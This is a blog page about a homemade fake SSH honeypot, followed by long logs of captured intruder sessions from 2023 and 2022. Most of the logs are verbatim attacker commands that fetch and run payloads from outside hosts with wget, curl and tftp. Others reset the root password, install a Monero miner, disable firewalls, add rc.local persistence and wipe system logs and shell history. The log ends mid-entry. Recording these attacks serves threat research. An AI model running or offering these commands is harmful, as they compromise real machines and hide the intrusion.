Emil's Projects & Reviews: Fake SSH Server

Fake SSH Server 7th April 2015

I've started from an existing tiny ssh server implementation and I've changed it into a fake ssh one (fakesshd.tar.gz).

The server recognizes the following Unix commands and outputs a plausible output for each:

"busybox" "cat" "cd" "chmod" "df" "echo"
"free" "gcc" "grep" "id" "ifconfig"
"killall" "logout" "ls" "ll" "lscpu" "make" "mv"
"netstat" "nproc" "ps" "pwd"
"uname" "uptime" "w" "wget" "whoami"

I have installed this fake service on a few machines (including this one) as a honeypot SSH server (fakessh). To log in as "root" you need to enter a password which starts with "1". The vast majority of logins are done by automatic scripts which search for weak passwords and repeatedly execute the same commands even when they "log in" with different passwords. Since mid 2018 I've noticed ssh login attempts to non-standard ports like 2222 and 1022 intensifying.

Bellow are the hacking attempts I've captured over the last few years. Connection only attempts are filtered out. Identical sessions arrive from multiple IPs and are often repeated so only unique sessions are kept. Most interesting for study are the payloads downloaded on compromised machines (usually arguments of wget, curl and ftp).

File: fakesshd-log-2023.txt


From 148.72.247.138 5-Jan-2023 04:12:30 ssh2 root
Exec curl -Ls http://209.141.34.192/jack5tr.sh | sh
curl -Ls http://209.141.34.192/jack5tr.sh | sh

From 148.72.247.138 5-Jan-2023 04:49:57 ssh2 root
Exec cd /tmp; wget http://209.141.34.192/idk/home.arc -o arc;chmod 777 arc;./arc;wget http://209.141.34.192/idk/home.arm -o arm;chmod 777 arm;./arm;wget http://209.141.34.192/idk/home.arm5 -o arm5;chmod 777 arm5;./arm5;wget http://209.141.34.192/idk/home.arm6 -o arm6;chmod 777 arm6;./arm6;wget http://209.141.34.192/idk/home.arm7 -o arm7;chmod 777 arm7;./arm7;wget http://209.141.34.192/idk/home.m68k -o m68k;chmod 777 m68k;./m68k;wget http://209.141.34.192/idk/home.mips -o mips;chmod 777 mips;./mips;wget http://209.141.34.192/idk/home.mpsl -o mpsl;chmod 777 mpsl;./mpsl;wget http://209.141.34.192/idk/home.ppc -o ppc;chmod 777 ppc;./ppc;wget http://209.141.34.192/idk/home.sh4 -o sh4;chmod 777 sh4;./sh4;wget http://209.141.34.192/idk/home.spc -o spc;chmod 777 spc;./spc;wget http://209.141.34.192/idk/home.x86 -o x86;chmod 777 x86;./x86
cd /tmp
wget http://209.141.34.192/idk/home.arc -o arc
chmod 777 arc
./arc
wget http://209.141.34.192/idk/home.arm -o arm
chmod 777 arm
./arm
wget http://209.141.34.192/idk/home.arm5 -o arm5
chmod 777 arm5
./arm5
wget http://209.141.34.192/idk/home.arm6 -o arm6
chmod 777 arm6
./arm6
wget http://209.141.34.192/idk/home.arm7 -o arm7
chmod 777 arm7
./arm7
wget http://209.141.34.192/idk/home.m68k -o m68k
chmod 777 m68k
./m68k
wget http://209.141.34.192/idk/home.mips -o mips
chmod 777 mips
./mips
wget http://209.141.34.192/idk/home.mpsl -o mpsl
chmod 777 mpsl
./mpsl
wget http://209.141.34.192/idk/home.ppc -o ppc
chmod 777 ppc
./ppc
wget http://209.141.34.192/idk/home.sh4 -o sh4
chmod 777 sh4
./sh4
wget http://209.141.34.192/idk/home.spc -o spc
chmod 777 spc
./spc
wget http://209.141.34.192/idk/home.x86 -o x86
chmod 777 x86
./x86

From 158.140.119.157 20-Jan-2023 16:04:49 ssh2 root
free -m

From 82.205.13.88 21-Jan-2023 11:27:14 ssh2 root
ls
free -m

From 181.64.10.35 26-Jan-2023 21:12:38 ssh2 root
Exec wget http://194.180.49.134/pedalcheta/cutie.x86_64; curl -O http://194.180.49.134/pedalcheta/cutie.x86_64; chmod 777 cutie.*; ./cutie.x86_64 x86h; rm -rf cutie.*
wget http://194.180.49.134/pedalcheta/cutie.x86_64
curl -O http://194.180.49.134/pedalcheta/cutie.x86_64
chmod 777 cutie.*
./cutie.x86_64 x86h
rm -rf cutie.*

From 181.64.10.35 27-Jan-2023 03:36:29 ssh2 root
Exec lscpu | grep "CPU(s):                " && echo -e "Wh4H39xC\nWh4H39xC" | passwd && wget http://194.180.49.134/pedalcheta/cutie.x86_64; curl -O http://194.180.49.134/pedalcheta/cutie.x86_64; chmod 777 cutie.*; ./cutie.x86_64 x86h; rm -rf cutie.*
lscpu | grep "CPU(s): "
echo -e "Wh4H39xC\nWh4H39xC" | passwd
wget http://194.180.49.134/pedalcheta/cutie.x86_64
curl -O http://194.180.49.134/pedalcheta/cutie.x86_64
chmod 777 cutie.*
./cutie.x86_64 x86h
rm -rf cutie.*

From 181.64.10.35 27-Jan-2023 08:26:51 ssh2 root
Exec lscpu | grep "CPU(s):                " && echo -e "QjJsxzCz\nQjJsxzCz" | passwd && wget http://194.180.49.134/pedalcheta/cutie.x86_64; curl -O http://194.180.49.134/pedalcheta/cutie.x86_64; chmod 777 cutie.*; ./cutie.x86_64 x86h; rm -rf cutie.*
lscpu | grep "CPU(s): "
echo -e "QjJsxzCz\nQjJsxzCz" | passwd
wget http://194.180.49.134/pedalcheta/cutie.x86_64
curl -O http://194.180.49.134/pedalcheta/cutie.x86_64
chmod 777 cutie.*
./cutie.x86_64 x86h
rm -rf cutie.*

From 181.64.10.35 27-Jan-2023 09:27:16 ssh2 root
Exec lscpu | grep "CPU(s):                " && echo -e "UeRP5vZx\nUeRP5vZx" | passwd && wget http://194.180.49.134/pedalcheta/cutie.x86_64; curl -O http://194.180.49.134/pedalcheta/cutie.x86_64; chmod 777 cutie.*; ./cutie.x86_64 x86h; rm -rf cutie.*
lscpu | grep "CPU(s): "
echo -e "UeRP5vZx\nUeRP5vZx" | passwd
wget http://194.180.49.134/pedalcheta/cutie.x86_64
curl -O http://194.180.49.134/pedalcheta/cutie.x86_64
chmod 777 cutie.*
./cutie.x86_64 x86h
rm -rf cutie.*

From 181.64.10.35 27-Jan-2023 14:54:53 ssh2 root
Exec lscpu | grep "CPU(s):                " && echo -e "YSDVwzc4\nYSDVwzc4" | passwd && wget http://194.180.49.134/pedalcheta/cutie.x86_64; curl -O http://194.180.49.134/pedalcheta/cutie.x86_64; chmod 777 cutie.*; ./cutie.x86_64 x86h; rm -rf cutie.*
lscpu | grep "CPU(s): "
echo -e "YSDVwzc4\nYSDVwzc4" | passwd
wget http://194.180.49.134/pedalcheta/cutie.x86_64
curl -O http://194.180.49.134/pedalcheta/cutie.x86_64
chmod 777 cutie.*
./cutie.x86_64 x86h
rm -rf cutie.*

From 20.164.37.170 27-Jan-2023 17:38:37 ssh2 root
Exec cat /proc/uptime
cat /proc/uptime
Exec cat /proc/uptime
cat /proc/uptime
Exec cat /proc/uptime
cat /proc/uptime
Exec cat /proc/uptime
cat /proc/uptime

From 181.64.10.35 27-Jan-2023 18:56:05 ssh2 root
Exec lscpu | grep "CPU(s):                " && echo -e "QfHpPJjt\nQfHpPJjt" | passwd && wget http://194.180.49.134/pedalcheta/cutie.x86_64; curl -O http://194.180.49.134/pedalcheta/cutie.x86_64; chmod 777 cutie.*; ./cutie.x86_64 x86h; rm -rf cutie.*
lscpu | grep "CPU(s): "
echo -e "QfHpPJjt\nQfHpPJjt" | passwd
wget http://194.180.49.134/pedalcheta/cutie.x86_64
curl -O http://194.180.49.134/pedalcheta/cutie.x86_64
chmod 777 cutie.*
./cutie.x86_64 x86h
rm -rf cutie.*

From 181.64.10.35 27-Jan-2023 23:57:05 ssh2 root
Exec lscpu | grep "CPU(s):                " && echo -e "TFPNqqrA\nTFPNqqrA" | passwd && wget http://194.180.49.134/pedalcheta/cutie.x86_64; curl -O http://194.180.49.134/pedalcheta/cutie.x86_64; chmod 777 cutie.*; ./cutie.x86_64 x86h; rm -rf cutie.*
lscpu | grep "CPU(s): "
echo -e "TFPNqqrA\nTFPNqqrA" | passwd
wget http://194.180.49.134/pedalcheta/cutie.x86_64
curl -O http://194.180.49.134/pedalcheta/cutie.x86_64
chmod 777 cutie.*
./cutie.x86_64 x86h
rm -rf cutie.*

From 159.89.177.99 28-Jan-2023 12:51:37 ssh2 root
Exec lscpu && echo -e "e6HpWyGH\ne6HpWyGH" | passwd
lscpu
echo -e "e6HpWyGH\ne6HpWyGH" | passwd

From 34.23.185.255 29-Jan-2023 04:08:13 ssh2 root
Exec lscpu | grep "CPU(s):                " && echo -e "aCUsGMQF\naCUsGMQF" | passwd && wget http://194.180.49.134/pedalcheta/cutie.x86_64; curl -O http://194.180.49.134/pedalcheta/cutie.x86_64; chmod 777 cutie.*; ./cutie.x86_64 x86h; rm -rf cutie.*
lscpu | grep "CPU(s): "
echo -e "aCUsGMQF\naCUsGMQF" | passwd
wget http://194.180.49.134/pedalcheta/cutie.x86_64
curl -O http://194.180.49.134/pedalcheta/cutie.x86_64
chmod 777 cutie.*
./cutie.x86_64 x86h
rm -rf cutie.*

From 148.72.247.138 30-Jan-2023 05:23:15 ssh2 root
Exec whoami>sbmg
whoami>sbmg

From 148.72.247.138 30-Jan-2023 11:27:15 ssh2 root
Exec cat sbmg
cat sbmg

From 38.91.107.43 2-Feb-2023 12:21:23 ssh2 root
Exec lscpu | grep "CPU(s):                " && echo -e "Uym3g3CQ\nUym3g3CQ" | passwd && wget http://194.180.49.134/pedalcheta/cutie.x86_64; curl -O http://194.180.49.134/pedalcheta/cutie.x86_64; chmod 777 cutie.*; ./cutie.x86_64 x86h; rm -rf cutie.*
lscpu | grep "CPU(s): "
echo -e "Uym3g3CQ\nUym3g3CQ" | passwd
wget http://194.180.49.134/pedalcheta/cutie.x86_64
curl -O http://194.180.49.134/pedalcheta/cutie.x86_64
chmod 777 cutie.*
./cutie.x86_64 x86h
rm -rf cutie.*

From 181.64.10.35 4-Feb-2023 16:33:47 ssh2 root
Exec lscpu | grep "CPU(s):                " && echo -e "FvZbzDZr\nFvZbzDZr" | passwd && wget http://163.123.142.241/x86_64; curl -s -O http://163.123.142.241/x86_64; chmod 777 x86_64; ./x86_64 x86h; rm -rf x86_64*
lscpu | grep "CPU(s): "
echo -e "FvZbzDZr\nFvZbzDZr" | passwd
wget http://163.123.142.241/x86_64
curl -s -O http://163.123.142.241/x86_64
chmod 777 x86_64
./x86_64 x86h
rm -rf x86_64*

From 141.255.150.190 12-Feb-2023 07:17:00 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://104.244.75.53/bins.sh; chmod +x bins.sh; sh bins.sh; tftp 104.244.75.53 -c get tftp1.sh; chmod +x tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 104.244.75.53; chmod +x tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 104.244.75.53 ftp1.sh ftp1.sh; sh ftp1.sh tftp1.sh tftp2.sh ftp1.sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://104.244.75.53/bins.sh
chmod +x bins.sh
sh bins.sh
tftp 104.244.75.53 -c get tftp1.sh
chmod +x tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 104.244.75.53
chmod +x tftp2.sh
sh tftp2.sh
ftpget -v -u anonymous -p anonymous -P 21 104.244.75.53 ftp1.sh ftp1.sh
sh ftp1.sh tftp1.sh tftp2.sh ftp1.sh

From 104.244.75.53 15-Feb-2023 05:56:21 ssh2 root
Exec cat /etc/passwd | grep sh
cat /etc/passwd | grep sh

From 107.175.127.57 1-Mar-2023 16:33:03 ssh2 root
Exec cat > kg9at; chmod +x kg9at; ./kg9at &
cat > kg9at
chmod +x kg9at
./kg9at

From 159.89.174.36 3-Mar-2023 12:14:43 ssh2 root
Exec uname -s -n -r -i
uname -s -n -r -i

From 141.98.11.87 3-Mar-2023 19:47:58 ssh2 root
Exec lscpu | grep "CPU(s):                " && echo -e "VUtj9cSZ\nVUtj9cSZ" | passwd && wget http://109.206.240.49/x86_64; curl -s -O http://109.206.240.49/x86_64; chmod 777 x86_64; ./x86_64 turkey86; rm -rf x86_64*
lscpu | grep "CPU(s): "
echo -e "VUtj9cSZ\nVUtj9cSZ" | passwd
wget http://109.206.240.49/x86_64
curl -s -O http://109.206.240.49/x86_64
chmod 777 x86_64
./x86_64 turkey86
rm -rf x86_64*

From 141.98.10.217 5-Mar-2023 20:00:18 ssh2 root
Exec lscpu | grep "CPU(s):                " && echo -e "weHmU3gp\nweHmU3gp" | passwd && wget http://45.125.66.144/x86_64; curl -s -O http://45.125.66.144/x86_64; chmod 777 x86_64; ./x86_64 x86h; rm -rf x86_64*
lscpu | grep "CPU(s): "
echo -e "weHmU3gp\nweHmU3gp" | passwd
wget http://45.125.66.144/x86_64
curl -s -O http://45.125.66.144/x86_64
chmod 777 x86_64
./x86_64 x86h
rm -rf x86_64*

From 222.248.193.63 15-Mar-2023 13:51:20 ssh2 root
Exec cat > ; chmod +x ; ./ &
cat >
chmod +x
./

From 83.9.84.21 24-Mar-2023 15:02:30 ssh2 root
Exec cd /tmp || cd /var/tmp || cd /root || cd /; wget http://193.35.18.163/html.sh; curl -O http://193.35.18.163/html.sh; chmod +x html.sh; sh html.sh; /bin/busybox ftpget -u anonymous -p anonymous -P 21 193.35.18.163 ftp.sh ftp.sh -v; chmod +x ftp.sh; sh ftp.sh; /bin/busybox tftp -g -r tftp.sh; sh tftp.sh; tftp 193.35.18.163 -c get tftp2.sh; chmod +x tftp2.sh; sh tftp2.sh; rm -rf html.sh ftp.sh tftp.sh tftp2.sh
cd /tmp || cd /var/tmp || cd /root || cd /
wget http://193.35.18.163/html.sh
curl -O http://193.35.18.163/html.sh
chmod +x html.sh
sh html.sh
/bin/busybox ftpget -u anonymous -p anonymous -P 21 193.35.18.163 ftp.sh ftp.sh -v
chmod +x ftp.sh
sh ftp.sh
/bin/busybox tftp -g -r tftp.sh
sh tftp.sh
tftp 193.35.18.163 -c get tftp2.sh
chmod +x tftp2.sh
sh tftp2.sh
rm -rf html.sh ftp.sh tftp.sh tftp2.sh

From 185.213.155.174 26-Mar-2023 00:38:39 ssh2 root
Exec cd /tmp || cd /var/tmp || cd /root || cd /; wget http://193.35.18.163/html.sh; curl -O http://193.35.18.163/html.sh; chmod +x html.sh; sh html.sh; rm -rf html.sh
cd /tmp || cd /var/tmp || cd /root || cd /
wget http://193.35.18.163/html.sh
curl -O http://193.35.18.163/html.sh
chmod +x html.sh
sh html.sh
rm -rf html.sh

From 173.188.1.111 29-Mar-2023 21:48:27 ssh2 root
Exec sudo mount -o remount,rw / || mount -o remount,rw /; mkdir -p /tmp/criptonize/criptonize2 || mkdir -p /var/tmp/criptonize/criptonize2 || mkdir -p /dev/criptonize/criptonize2 || mkdir -p criptonize/criptonize2; cd /tmp/criptonize || cd /var/tmp/criptonize || cd /dev/criptonize || cd criptonize; ls -F
sudo mount -o remount,rw / || mount -o remount,rw /
mkdir -p /tmp/criptonize/criptonize2 || mkdir -p /var/tmp/criptonize/criptonize2 || mkdir -p /dev/criptonize/criptonize2 || mkdir -p criptonize/criptonize2
cd /tmp/criptonize || cd /var/tmp/criptonize || cd /dev/criptonize || cd criptonize
ls -F

From 185.224.128.215 24-Apr-2023 03:47:16 ssh2 root
Exec top -b -n 1
top -b -n 1

From 141.98.10.172 24-Apr-2023 10:31:31 ssh2 root
Exec lscpu | grep "CPU(s):                " && echo -e "qmK2ZvdE\nqmK2ZvdE" | passwd && cd /tmp; wget http://45.95.146.26/pedalcheta/cutie.x86_64; curl -s -O http://45.95.146.26/pedalcheta/cutie.x86_64; chmod 777 cutie.x86_64; ./cutie.x86_64 x86h; rm -rf cutie.*
lscpu | grep "CPU(s): "
echo -e "qmK2ZvdE\nqmK2ZvdE" | passwd
cd /tmp
wget http://45.95.146.26/pedalcheta/cutie.x86_64
curl -s -O http://45.95.146.26/pedalcheta/cutie.x86_64
chmod 777 cutie.x86_64
./cutie.x86_64 x86h
rm -rf cutie.*

From 141.98.10.172 26-Apr-2023 05:47:26 ssh2 root
Exec lscpu | grep "CPU(s):                " && echo -e "7aep3j7d\n7aep3j7d" | passwd && cd /tmp; wget http://45.95.146.26/pedalcheta/cutie.x86_64; curl -s -O http://45.95.146.26/pedalcheta/cutie.x86_64; chmod 777 cutie.x86_64; ./cutie.x86_64 x86h; rm -rf cutie.*
lscpu | grep "CPU(s): "
echo -e "7aep3j7d\n7aep3j7d" | passwd
cd /tmp
wget http://45.95.146.26/pedalcheta/cutie.x86_64
curl -s -O http://45.95.146.26/pedalcheta/cutie.x86_64
chmod 777 cutie.x86_64
./cutie.x86_64 x86h
rm -rf cutie.*

From 185.224.128.121 27-May-2023 08:50:32 ssh2 root
Exec lscpu | grep "CPU(s):                " && echo -e "GRrvAxKNNXPe\nGRrvAxKNNXPe" | passwd && cd /tmp; wget http://84.54.50.198/pedalcheta/cutie.x86_64; curl -s -O http://84.54.50.198/pedalcheta/cutie.x86_64; chmod 777 cutie.x86_64; ./cutie.x86_64 x86h; rm -rf cutie.*; cd /root; rm -rf *; pkill xmrig
lscpu | grep "CPU(s): "
echo -e "GRrvAxKNNXPe\nGRrvAxKNNXPe" | passwd
cd /tmp
wget http://84.54.50.198/pedalcheta/cutie.x86_64
curl -s -O http://84.54.50.198/pedalcheta/cutie.x86_64
chmod 777 cutie.x86_64
./cutie.x86_64 x86h
rm -rf cutie.*
cd /root
rm -rf *
pkill xmrig

From 185.224.128.141 29-May-2023 01:27:01 ssh2 root
Exec lscpu | grep "CPU(s):                " && echo -e "8eDZ8J2qWyES\n8eDZ8J2qWyES" | passwd && cd /tmp; wget http://84.54.50.198/pedalcheta/cutie.x86_64; curl -s -O http://84.54.50.198/pedalcheta/cutie.x86_64; chmod 777 cutie.x86_64; ./cutie.x86_64 x86h
lscpu | grep "CPU(s): "
echo -e "8eDZ8J2qWyES\n8eDZ8J2qWyES" | passwd
cd /tmp
wget http://84.54.50.198/pedalcheta/cutie.x86_64
curl -s -O http://84.54.50.198/pedalcheta/cutie.x86_64
chmod 777 cutie.x86_64
./cutie.x86_64 x86h

From 222.138.252.23 1-Jun-2023 06:07:04 ssh2 root
Exec whoami
whoami

From 222.138.252.23 1-Jun-2023 06:07:08 ssh2 root
Exec curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 44XHRLz9VS35WMFVDgY6qBfCGR3mSjw86gDGtU9h9FjWdKSdH5kumvWip4qYc9v6kmepzzJeFSGdbC9ypm58hw6zRYNgbej
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 44XHRLz9VS35WMFVDgY6qBfCGR3mSjw86gDGtU9h9FjWdKSdH5kumvWip4qYc9v6kmepzzJeFSGdbC9ypm58hw6zRYNgbej

From 120.48.61.50 6-Jun-2023 13:54:29 ssh2 root
Exec cat /proc/uptime
cat /proc/uptime
Exec cat /proc/uptime
cat /proc/uptime

From 62.171.188.18 11-Jun-2023 19:32:46 ssh2 root
Exec cat /proc/cpuinfo | grep name | cut -f2 -d: | uniq -c
cat /proc/cpuinfo | grep name | cut -f2 -d: | uniq -c

From 81.4.111.62 11-Jun-2023 19:34:25 ssh2 root
w
ps x
clear
ps x
clear
uname -a
nproc
cat /proc/cpuinfo | grep name | cut -f2 -d: | uniq -c
exit

From 36.133.86.212 11-Jun-2023 21:29:48 ssh2 root
Exec cd /tmp ; wget 193.233.202.219/bot ; perl bot ; rm -rf bot
cd /tmp
wget 193.233.202.219/bot
perl bot
rm -rf bot

From 185.224.128.121 20-Jun-2023 10:08:02 ssh2 root
Exec uname -a
uname -a

From 31.94.63.220 27-Jun-2023 07:15:32 ssh2 root
w
ps aux
wget
cd /tmp
unset HISTFILE
unset HISTSAVE
history -n
unset WATCH
export HISTFILE=/dev/null
cd /var/log/
rm -rf wtmp
rm -rf secure
cd /var/log/
rm -rf lastlog
rm -rf messages
touch messagess
touch wtmp
touch secure
touch lastlog
cd /root
rm -rf .bash_history
touch .bash_history unset
rm -rf /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog
touch /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog
unset HISTFILE
unset HISTSAVE
unset HISTLOG
history -n
unset WATCH
export HISTFILE=/dev/null
export HISTFILE=/dev/null
wget http://81.68.84.38/.-/xx

From 42.81.126.15 7-Jul-2023 16:15:16 ssh2 root
Exec cat /proc/uptime
cat /proc/uptime

From 138.197.88.77 7-Jul-2023 18:58:02 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://beautypluspartner.ml/mnoger.sh; chmod 777 mnoger.sh; sh mnoger.sh; tftp beautypluspartner.ml -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g beautypluspartner.ml; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://beautypluspartner.ml/mnoger.sh
chmod 777 mnoger.sh
sh mnoger.sh
tftp beautypluspartner.ml -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g beautypluspartner.ml
chmod 777 tftp2.sh
sh tftp2.sh
rm -rf *

From 139.59.20.195 9-Jul-2023 14:30:05 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://masarotunda.ml/mnoger.sh; chmod 777 mnoger.sh; sh mnoger.sh; tftp masarotunda.ml -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g masarotunda.ml; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://masarotunda.ml/mnoger.sh
chmod 777 mnoger.sh
sh mnoger.sh
tftp masarotunda.ml -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g masarotunda.ml
chmod 777 tftp2.sh
sh tftp2.sh
rm -rf *

From 103.238.71.108 10-Jul-2023 13:23:36 ssh2 root
Exec uname -a
uname -a

From 211.178.70.13 10-Jul-2023 20:46:13 ssh2 root
Exec (uname -smr || /bin/uname -smr || /usr/bin/uname -smr)
(uname -smr || /bin/uname -smr || /usr/bin/uname -smr)

From 180.169.85.126 11-Jul-2023 05:08:12 ssh2 root
Exec cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a
cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c
uname -a

From 167.71.142.92 11-Jul-2023 05:12:44 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://horseriding3d.tk/mnoger.sh; chmod 777 mnoger.sh; sh mnoger.sh; tftp horseriding3d.tk -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g horseriding3d.tk; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://horseriding3d.tk/mnoger.sh
chmod 777 mnoger.sh
sh mnoger.sh
tftp horseriding3d.tk -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g horseriding3d.tk
chmod 777 tftp2.sh
sh tftp2.sh
rm -rf *

From 73.197.215.95 11-Jul-2023 10:25:22 ssh2 root
Exec uname -a || echo -
uname -a || echo -

From 81.68.162.185 11-Jul-2023 20:46:28 ssh2 root
Exec (uname -smr || /bin/uname -smr || /usr/bin/uname -smr)
(uname -smr || /bin/uname -smr || /usr/bin/uname -smr)
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 81.68.162.185 11-Jul-2023 21:20:20 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 36.110.228.254 12-Jul-2023 00:01:38 ssh2 root
Exec /ip cloud print
/ip cloud print

From 144.91.127.21 12-Jul-2023 00:11:06 ssh2 root
Exec uname -m
uname -m

From 45.95.146.46 17-Jul-2023 00:24:46 ssh2 root
Exec mkdir /tmp/cyberboot; cd /tmp/cyberboot;wget http://193.42.32.40/x86_64; curl http://193.42.32.40/x86_64; chmod 777 x86_64; ./x86_64 wns.x86; history -c
mkdir /tmp/cyberboot
cd /tmp/cyberboot
wget http://193.42.32.40/x86_64
curl http://193.42.32.40/x86_64
chmod 777 x86_64
./x86_64 wns.x86
history -c

From 146.70.126.240 19-Jul-2023 15:01:41 ssh2 root
top
uname -mp

From 185.195.232.166 20-Jul-2023 15:16:08 ssh2 root
uname -mp
top
apt
find /
exit

From 170.64.172.88 21-Jul-2023 15:15:58 ssh2 root
Exec uname -s -v -n -r -m
uname -s -v -n -r -m

From 68.183.64.48 23-Jul-2023 07:50:26 ssh2 root
Exec cd ~; chattr -ia .ssh; lockr -ia .ssh
cd ~
chattr -ia .ssh
lockr -ia .ssh

From 185.224.128.142 23-Jul-2023 15:43:05 ssh2 root
Exec lscpu | grep "CPU(s):                " && echo -e "3scMuZ7kAzjc\n3scMuZ7kAzjc" | passwd && cd /tmp  cd /var/run  cd /mnt  cd /root  cd /; wget http://109.206.242.217/linux/bins.sh; chmod +x bins.sh; sh bins.sh; rm -rf *
lscpu | grep "CPU(s): "
echo -e "3scMuZ7kAzjc\n3scMuZ7kAzjc" | passwd
cd /tmp cd /var/run cd /mnt cd /root cd /
wget http://109.206.242.217/linux/bins.sh
chmod +x bins.sh
sh bins.sh
rm -rf *

File: fakesshd-log-2022.txt


From 45.125.34.131 2-Jan-2022 00:17:32 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://45.147.26.129:8082/BT;chmod 777 BT;./BT;echo "cd /tmp/">>/etc/rc.local;echo "./BT&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://45.147.26.129:8082/BT
chmod 777 BT
./BT
echo "cd /tmp/">>/etc/rc.local
echo "./BT
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 45.125.34.131 2-Jan-2022 01:22:10 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://45.147.26.129:8082/BT;chmod 777 BT;./BT;echo "cd /tmp/">>/etc/rc.local;echo "./BT&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://45.147.26.129:8082/BT
chmod 777 BT
./BT
echo "cd /tmp/">>/etc/rc.local
echo "./BT
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://45.147.26.129:8082/BT;chmod 777 BT;./BT;echo "cd /tmp/">>/etc/rc.local;echo "./BT&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://45.147.26.129:8082/BT
chmod 777 BT
./BT
echo "cd /tmp/">>/etc/rc.local
echo "./BT
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 164.90.230.201 2-Jan-2022 01:22:23 ssh2 root
Exec wget https://www.nasapaul.com/ninfo; curl -O https://www.nasapaul.com/ninfo; chmod 777 *; ./ninfo
wget https://www.nasapaul.com/ninfo
curl -O https://www.nasapaul.com/ninfo
chmod 777 *
./ninfo

From 222.186.133.160 2-Jan-2022 02:41:42 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.160:8090/gnmd;chmod 777 gnmd;./gnmd;echo "cd /tmp/">>/etc/rc.local;echo "./gnmd&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.160:8090/gnmd
chmod 777 gnmd
./gnmd
echo "cd /tmp/">>/etc/rc.local
echo "./gnmd
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.160:8090/gnmd;chmod 777 gnmd;./gnmd;echo "cd /tmp/">>/etc/rc.local;echo "./gnmd&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.160:8090/gnmd
chmod 777 gnmd
./gnmd
echo "cd /tmp/">>/etc/rc.local
echo "./gnmd
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.160:8090/gnmd;chmod 777 gnmd;./gnmd;echo "cd /tmp/">>/etc/rc.local;echo "./gnmd&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.160:8090/gnmd
chmod 777 gnmd
./gnmd
echo "cd /tmp/">>/etc/rc.local
echo "./gnmd
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 222.186.133.160 2-Jan-2022 02:41:42 ssh2 root
